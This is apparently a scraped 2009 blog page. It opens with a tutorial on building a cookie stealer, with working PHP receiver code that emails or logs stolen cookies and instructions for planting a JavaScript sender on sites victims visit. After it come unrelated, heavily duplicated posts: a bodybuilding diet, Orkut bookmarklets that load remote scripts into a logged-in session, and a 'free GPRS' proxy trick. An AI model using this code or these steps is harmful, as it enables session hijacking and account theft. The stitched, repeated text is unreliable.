How to Make a Cookie Stealer
Introduction
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
Wednesday, September 30, 2009
Monday, September 28, 2009
Romentic songs
Very Romentic Songs
Tuesday, September 22, 2009
Diet For Body Builders
An hour of tough workout and a carefully planned nutritional diet goes a long way in assuring a good physique. For body builders, consumption of a balanced diet becomes quintessential. Believe it or not - appropriate nutrition truly decides how successful one can be in the bodybuilding schedule. The diet should be planned in a manner that it helps in muscle gaining and not in weight gain. You must also realize that consuming supplements alone will not do wonders for your body. They can only enhance and contribute to the bodybuilding process.
Ideally the body building diet should include food items that contain all categories of nutrients. It is essential to consume all the nutrients, be it proteins, carbohydrates or fats. Some of the various items that bodybuilders can consume for the intake of proteins are: lean meat, fish, eggs, milk, nuts etc. For carbohydrates, brown rice, potatoes, whole meal bread, fresh fruits and vegetables can be the best bet. However, indulging in white flour products can rebound your efforts.
Basic Rules
As a bodybuilder, the foremost thing you need to do is follow the basic rules of diet. Go for small and regular feedings, instead of binging on irregular and large ones. The best option would be to eat six meals a day, spaces out at 2 ½ hours intervals. The proportion of carbohydrates, fats and protein intake should be in the ratio of 4:2:4. This ratio ideally helps in reducing weight and building an impressive muscular body. However, make sure you do not consume carbohydrates three to four hours before going off to sleep.
Week 1 & 2
An important rule for week the first two weeks would be to cycle calories intake. This would help your body avoid the metabolism from getting used to a certain caloric level. For those, who want to increase the muscle mass, go for two days of lower calorie and five days of high calorie diet. However, those of you, who want to lose fat; you need to follow five days of lower caloric intake and two days of high calories. Remember, you diet should provide you with support to indulge in the higher level of physical activity.
Week 3 & 4
Instead of frying food items, begin roasting and steaming. Go for skinless chicken or turkey, instead of high fat meats. Processed foods and junk foods are strict no-no for bodybuilders. The next step would be to eliminate refined sugars from the diet. High sugar content foods like fruit juices and carbonated drinks should pave way for diet sodas. In due course of time, the best bet would be to settle down to water. Make it your main beverage and increase its consumption level. Follow this diet plan, as it is sure to augment with your efforts for a good build-up
Ideally the body building diet should include food items that contain all categories of nutrients. It is essential to consume all the nutrients, be it proteins, carbohydrates or fats. Some of the various items that bodybuilders can consume for the intake of proteins are: lean meat, fish, eggs, milk, nuts etc. For carbohydrates, brown rice, potatoes, whole meal bread, fresh fruits and vegetables can be the best bet. However, indulging in white flour products can rebound your efforts.
Basic Rules
As a bodybuilder, the foremost thing you need to do is follow the basic rules of diet. Go for small and regular feedings, instead of binging on irregular and large ones. The best option would be to eat six meals a day, spaces out at 2 ½ hours intervals. The proportion of carbohydrates, fats and protein intake should be in the ratio of 4:2:4. This ratio ideally helps in reducing weight and building an impressive muscular body. However, make sure you do not consume carbohydrates three to four hours before going off to sleep.
Week 1 & 2
An important rule for week the first two weeks would be to cycle calories intake. This would help your body avoid the metabolism from getting used to a certain caloric level. For those, who want to increase the muscle mass, go for two days of lower calorie and five days of high calorie diet. However, those of you, who want to lose fat; you need to follow five days of lower caloric intake and two days of high calories. Remember, you diet should provide you with support to indulge in the higher level of physical activity.
Week 3 & 4
Instead of frying food items, begin roasting and steaming. Go for skinless chicken or turkey, instead of high fat meats. Processed foods and junk foods are strict no-no for bodybuilders. The next step would be to eliminate refined sugars from the diet. High sugar content foods like fruit juices and carbonated drinks should pave way for diet sodas. In due course of time, the best bet would be to settle down to water. Make it your main beverage and increase its consumption level. Follow this diet plan, as it is sure to augment with your efforts for a good build-up
Diet For Body Builders
Diet For Body Builders
An hour of tough workout and a carefully planned nutritional diet goes a long way in assuring a good physique. For body builders, consumption of a balanced diet becomes quintessential. Believe it or not - appropriate nutrition truly decides how successful one can be in the bodybuilding schedule. The diet should be planned in a manner that it helps in muscle gaining and not in weight gain. You must also realize that consuming supplements alone will not do wonders for your body. They can only enhance and contribute to the bodybuilding process.
Ideally the body building diet should include food items that contain all categories of nutrients. It is essential to consume all the nutrients, be it proteins, carbohydrates or fats. Some of the various items that bodybuilders can consume for the intake of proteins are: lean meat, fish, eggs, milk, nuts etc. For carbohydrates, brown rice, potatoes, whole meal bread, fresh fruits and vegetables can be the best bet. However, indulging in white flour products can rebound your efforts.
Basic Rules
As a bodybuilder, the foremost thing you need to do is follow the basic rules of diet. Go for small and regular feedings, instead of binging on irregular and large ones. The best option would be to eat six meals a day, spaces out at 2 ½ hours intervals. The proportion of carbohydrates, fats and protein intake should be in the ratio of 4:2:4. This ratio ideally helps in reducing weight and building an impressive muscular body. However, make sure you do not consume carbohydrates three to four hours before going off to sleep.
Week 1 & 2
An important rule for week the first two weeks would be to cycle calories intake. This would help your body avoid the metabolism from getting used to a certain caloric level. For those, who want to increase the muscle mass, go for two days of lower calorie and five days of high calorie diet. However, those of you, who want to lose fat; you need to follow five days of lower caloric intake and two days of high calories. Remember, you diet should provide you with support to indulge in the higher level of physical activity.
Week 3 & 4
Instead of frying food items, begin roasting and steaming. Go for skinless chicken or turkey, instead of high fat meats. Processed foods and junk foods are strict no-no for bodybuilders. The next step would be to eliminate refined sugars from the diet. High sugar content foods like fruit juices and carbonated drinks should pave way for diet sodas. In due course of time, the best bet would be to settle down to water. Make it your main beverage and increase its consumption level. Follow this diet plan, as it is sure to augment with your efforts for a good build-up.
An hour of tough workout and a carefully planned nutritional diet goes a long way in assuring a good physique. For body builders, consumption of a balanced diet becomes quintessential. Believe it or not - appropriate nutrition truly decides how successful one can be in the bodybuilding schedule. The diet should be planned in a manner that it helps in muscle gaining and not in weight gain. You must also realize that consuming supplements alone will not do wonders for your body. They can only enhance and contribute to the bodybuilding process.
Ideally the body building diet should include food items that contain all categories of nutrients. It is essential to consume all the nutrients, be it proteins, carbohydrates or fats. Some of the various items that bodybuilders can consume for the intake of proteins are: lean meat, fish, eggs, milk, nuts etc. For carbohydrates, brown rice, potatoes, whole meal bread, fresh fruits and vegetables can be the best bet. However, indulging in white flour products can rebound your efforts.
Basic Rules
As a bodybuilder, the foremost thing you need to do is follow the basic rules of diet. Go for small and regular feedings, instead of binging on irregular and large ones. The best option would be to eat six meals a day, spaces out at 2 ½ hours intervals. The proportion of carbohydrates, fats and protein intake should be in the ratio of 4:2:4. This ratio ideally helps in reducing weight and building an impressive muscular body. However, make sure you do not consume carbohydrates three to four hours before going off to sleep.
Week 1 & 2
An important rule for week the first two weeks would be to cycle calories intake. This would help your body avoid the metabolism from getting used to a certain caloric level. For those, who want to increase the muscle mass, go for two days of lower calorie and five days of high calorie diet. However, those of you, who want to lose fat; you need to follow five days of lower caloric intake and two days of high calories. Remember, you diet should provide you with support to indulge in the higher level of physical activity.
Week 3 & 4
Instead of frying food items, begin roasting and steaming. Go for skinless chicken or turkey, instead of high fat meats. Processed foods and junk foods are strict no-no for bodybuilders. The next step would be to eliminate refined sugars from the diet. High sugar content foods like fruit juices and carbonated drinks should pave way for diet sodas. In due course of time, the best bet would be to settle down to water. Make it your main beverage and increase its consumption level. Follow this diet plan, as it is sure to augment with your efforts for a good build-up.
Monday, September 21, 2009
Scrap to all your with just One click, Have you ever wondered this? It sends a common scrap to all your friends at a single time ,Well this script seems to be more interesting as it doesn’t have any installation methods like the previous scrap all methods and you also don’t need greesemonkey to be installed.
How To Scrap All
1. Copy The below Script In box and Paste In The Orkut Adress Bar(Adress Bar is a place Where you Type [www.orkut.com] )
Remember Must Be Logged On to Orkut while using these Script And not to paste the code in new window, Paste the code in yours Orkut Profile Adress Bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://scrapur.googlepages.com/scraps.js';void(0)
Or
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://scrapur.googlepages.com/s21.js';void(0)
(Use any One From Above Code) Hit Enter after pasting the code In Adress Bar ,A window will appear in front of you after Hitting Enter , Type yours Scrap in Box and Click Send scrap(S) and you are done ,
To Confirm whether Scrap are sent to all yours Friends or not check yours Friends ScrapBooks.
If still facing any problem with scrap all script fell free to post yours problems in Comments we will back with yrs solution soon , Remember to check updates for yours Problem Solution Here , if you have post yours problem in comments.
I Recommend you to Browse or Surf with Firefox rather then surf with Internet Explore Because ScrapAll Script Work Fast In this Firefox.Click The Below Link To Download Firefox.Note Update - Scrap All Script Is Restricted By Orkut To Only 50 Users So You can Only Send Scraps To Only 50 Users Every Day Better Select Friend and Then Send Scraps to Each Friend Every Day !!
How To Scrap All
1. Copy The below Script In box and Paste In The Orkut Adress Bar(Adress Bar is a place Where you Type [www.orkut.com] )
Remember Must Be Logged On to Orkut while using these Script And not to paste the code in new window, Paste the code in yours Orkut Profile Adress Bar.
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://scrapur.googlepages.com/scraps.js';void(0)
Or
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://scrapur.googlepages.com/s21.js';void(0)
(Use any One From Above Code) Hit Enter after pasting the code In Adress Bar ,A window will appear in front of you after Hitting Enter , Type yours Scrap in Box and Click Send scrap(S) and you are done ,
To Confirm whether Scrap are sent to all yours Friends or not check yours Friends ScrapBooks.
If still facing any problem with scrap all script fell free to post yours problems in Comments we will back with yrs solution soon , Remember to check updates for yours Problem Solution Here , if you have post yours problem in comments.
I Recommend you to Browse or Surf with Firefox rather then surf with Internet Explore Because ScrapAll Script Work Fast In this Firefox.Click The Below Link To Download Firefox.Note Update - Scrap All Script Is Restricted By Orkut To Only 50 Users So You can Only Send Scraps To Only 50 Users Every Day Better Select Friend and Then Send Scraps to Each Friend Every Day !!
Friday, September 11, 2009
Transfer Talktime To Other Prepaid
Now any one can transfer Airtel Talktime to other Prepaid number
by following steps
Dial *143*number you want to recharge#
an press the call button
e.g.- Dial *143*9876543210# and press the calling button
You can transfer Rs.50.
Its works in so many states in country so try it in your state
Idea Free GPRS
If you wanna use free idea GPRS
Then try this sittings on your mobile
APN:
Mmsc
Hompage:
Proxy:
10.4.42.15
Port:8080
Relince Download
and enjoy
Transfer Talktime To Other Prepaid
Now any one can transfer Airtel Talktime to other Prepaid number
by following steps
Dial *143*number you want to recharge#
an press the call button
e.g.- Dial *143*9876543210# and press the calling button
You can transfer Rs.50.
Its works in so many states in country so try it in your state
Idea Free GPRS
If you wanna use free idea GPRS
Then try this sittings on your mobile
APN:
Mmsc
Hompage:
http://concealme.com
Proxy:
10.4.42.15
Port:8080
and enjoy
by following steps
Dial *143*number you want to recharge#
an press the call button
e.g.- Dial *143*9876543210# and press the calling button
You can transfer Rs.50.
Its works in so many states in country so try it in your state
Idea Free GPRS
If you wanna use free idea GPRS
Then try this sittings on your mobile
APN:
Mmsc
Hompage:
http://concealme.com
Proxy:
10.4.42.15
Port:8080
and enjoy
Transfer Talktime To Other Prepaid
Now any one can transfer Airtel Talktime to other Prepaid number
by following steps
Dial *143*number you want to recharge#
an press the call button
e.g.- Dial *143*9876543210# and press the calling button
You can transfer Rs.50.
Its works in so many states in country
Subscribe to:
Posts (Atom)